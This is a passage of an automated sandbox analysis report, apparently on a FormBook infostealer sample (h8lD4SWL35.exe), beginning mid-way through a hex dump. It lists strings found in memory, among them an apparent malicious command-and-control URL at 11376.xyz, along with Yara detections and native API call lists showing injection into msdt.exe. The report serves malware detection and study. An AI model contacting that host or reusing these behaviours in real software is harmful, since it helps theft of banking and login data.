20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: h8lD4SWL35.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: h8lD4SWL35.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: msdt.exe, 00000005.00000002.492269209.0000000002E24000.00000004.00000020.sdmpString found in binary or memory: http://www.11376.xyz/
          Source: msdt.exe, 00000005.00000002.492269209.0000000002E24000.00000004.00000020.sdmpString found in binary or memory: http://www.11376.xyz/c
          Source: msdt.exe, 00000005.00000002.492269209.0000000002E24000.00000004.00000020.sdmpString found in binary or memory: http://www.11376.xyz/nsag/?AjU=WEYxfFr10ymru5OxaDoG/Amdd7m3iDRjniOpUd0nZrfzDh8VapTmqk6sbIliE5dwT
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.260720785.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EB9

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273894363.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273962735.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.492349966.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.492377238.0000000002EE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.h8lD4SWL35.exe.3150000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.h8lD4SWL35.exe.3150000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273894363.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273894363.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273962735.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273962735.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.492349966.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.492349966.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.492377238.0000000002EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.492377238.0000000002EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.h8lD4SWL35.exe.3150000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.h8lD4SWL35.exe.3150000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.h8lD4SWL35.exe.3150000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.h8lD4SWL35.exe.3150000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041817A NtCreateFile,1_2_0041817A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_004181BA NtCreateFile,1_2_004181BA
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041826A NtReadFile,1_2_0041826A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AA98F0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00AA9860
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9840 NtDelayExecution,LdrInitializeThunk,1_2_00AA9840
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA99A0 NtCreateSection,LdrInitializeThunk,1_2_00AA99A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00AA9910
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9A20 NtResumeThread,LdrInitializeThunk,1_2_00AA9A20
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00AA9A00
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9A50 NtCreateFile,LdrInitializeThunk,1_2_00AA9A50
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA95D0 NtClose,LdrInitializeThunk,1_2_00AA95D0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9540 NtReadFile,LdrInitializeThunk,1_2_00AA9540
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00AA96E0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00AA9660
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00AA97A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00AA9780
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00AA9FE0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00AA9710
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA98A0 NtWriteVirtualMemory,1_2_00AA98A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9820 NtEnumerateKey,1_2_00AA9820
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AAB040 NtSuspendThread,1_2_00AAB040
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA99D0 NtCreateProcessEx,1_2_00AA99D0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9950 NtQueueApcThread,1_2_00AA9950
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9A80 NtOpenDirectoryObject,1_2_00AA9A80
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9A10 NtQuerySection,1_2_00AA9A10
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AAA3B0 NtGetContextThread,1_2_00AAA3B0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9B00 NtSetValueKey,1_2_00AA9B00
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA95F0 NtQueryInformationFile,1_2_00AA95F0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9520 NtWaitForSingleObject,1_2_00AA9520
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AAAD30 NtSetContextThread,1_2_00AAAD30
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9560 NtWriteFile,1_2_00AA9560
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA96D0 NtCreateKey,1_2_00AA96D0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9610 NtEnumerateValueKey,1_2_00AA9610
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9670 NtQueryInformationProcess,1_2_00AA9670
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9650 NtQueryValueKey,1_2_00AA9650
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9730 NtQueryVirtualMemory,1_2_00AA9730
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AAA710 NtOpenProcessToken,1_2_00AAA710
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9760 NtOpenProcess,1_2_00AA9760
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA9770 NtSetInformationFile,1_2_00AA9770
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AAA770 NtOpenThread,1_2_00AAA770
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_1_004181C0 NtCreateFile,1_1_004181C0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_1_00418270 NtReadFile,1_1_00418270
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_1_004182F0 NtClose,1_1_004182F0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,1_1_004183A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_1_0041817A NtCreateFile,1_1_0041817A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D595D0 NtClose,LdrInitializeThunk,5_2_04D595D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59540 NtReadFile,LdrInitializeThunk,5_2_04D59540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D596D0 NtCreateKey,LdrInitializeThunk,5_2_04D596D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D596E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04D596E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59650 NtQueryValueKey,LdrInitializeThunk,5_2_04D59650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04D59660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59FE0 NtCreateMutant,LdrInitializeThunk,5_2_04D59FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59780 NtMapViewOfSection,LdrInitializeThunk,5_2_04D59780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59710 NtQueryInformationToken,LdrInitializeThunk,5_2_04D59710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59840 NtDelayExecution,LdrInitializeThunk,5_2_04D59840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59860 NtQuerySystemInformation,LdrInitializeThunk,5_2_04D59860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D599A0 NtCreateSection,LdrInitializeThunk,5_2_04D599A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04D59910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59A50 NtCreateFile,LdrInitializeThunk,5_2_04D59A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D595F0 NtQueryInformationFile,5_2_04D595F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59560 NtWriteFile,5_2_04D59560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D5AD30 NtSetContextThread,5_2_04D5AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59520 NtWaitForSingleObject,5_2_04D59520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59670 NtQueryInformationProcess,5_2_04D59670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59610 NtEnumerateValueKey,5_2_04D59610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D597A0 NtUnmapViewOfSection,5_2_04D597A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D5A770 NtOpenThread,5_2_04D5A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59770 NtSetInformationFile,5_2_04D59770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59760 NtOpenProcess,5_2_04D59760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D5A710 NtOpenProcessToken,5_2_04D5A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59730 NtQueryVirtualMemory,5_2_04D59730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D598F0 NtReadVirtualMemory,5_2_04D598F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D598A0 NtWriteVirtualMemory,5_2_04D598A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D5B040 NtSuspendThread,5_2_04D5B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59820 NtEnumerateKey,5_2_04D59820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D599D0 NtCreateProcessEx,5_2_04D599D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59950 NtQueueApcThread,5_2_04D59950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59A80 NtOpenDirectoryObject,5_2_04D59A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59A10 NtQuerySection,5_2_04D59A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59A00 NtProtectVirtualMemory,5_2_04D59A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59A20 NtResumeThread,5_2_04D59A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D5A3B0 NtGetContextThread,5_2_04D5A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D59B00 NtSetValueKey,5_2_04D59B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A882F0 NtClose,5_2_02A882F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A88270 NtReadFile,5_2_02A88270
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A883A0 NtAllocateVirtualMemory,5_2_02A883A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A881C0 NtCreateFile,5_2_02A881C0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8826A NtReadFile,5_2_02A8826A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A881BA NtCreateFile,5_2_02A881BA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8817A NtCreateFile,5_2_02A8817A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030CB
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_004046CA0_2_004046CA
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_00405FA40_2_00405FA4
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041B8081_2_0041B808
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041A2AA1_2_0041A2AA
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041BBA81_2_0041BBA8
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00408C601_2_00408C60
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041BD281_2_0041BD28
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00402D8E1_2_00402D8E
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041C7851_2_0041C785
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A920A01_2_00A920A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B320A81_2_00B320A8
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7B0901_2_00A7B090
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B328EC1_2_00B328EC
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B210021_2_00B21002
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A841201_2_00A84120
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6F9001_2_00A6F900
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B322AE1_2_00B322AE
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9EBB01_2_00A9EBB0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2DBD21_2_00B2DBD2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B32B281_2_00B32B28
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7841F1_2_00A7841F
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2D4661_2_00B2D466
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A925811_2_00A92581
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7D5E01_2_00A7D5E0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B325DD1_2_00B325DD
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A60D201_2_00A60D20
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B32D071_2_00B32D07
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B31D551_2_00B31D55
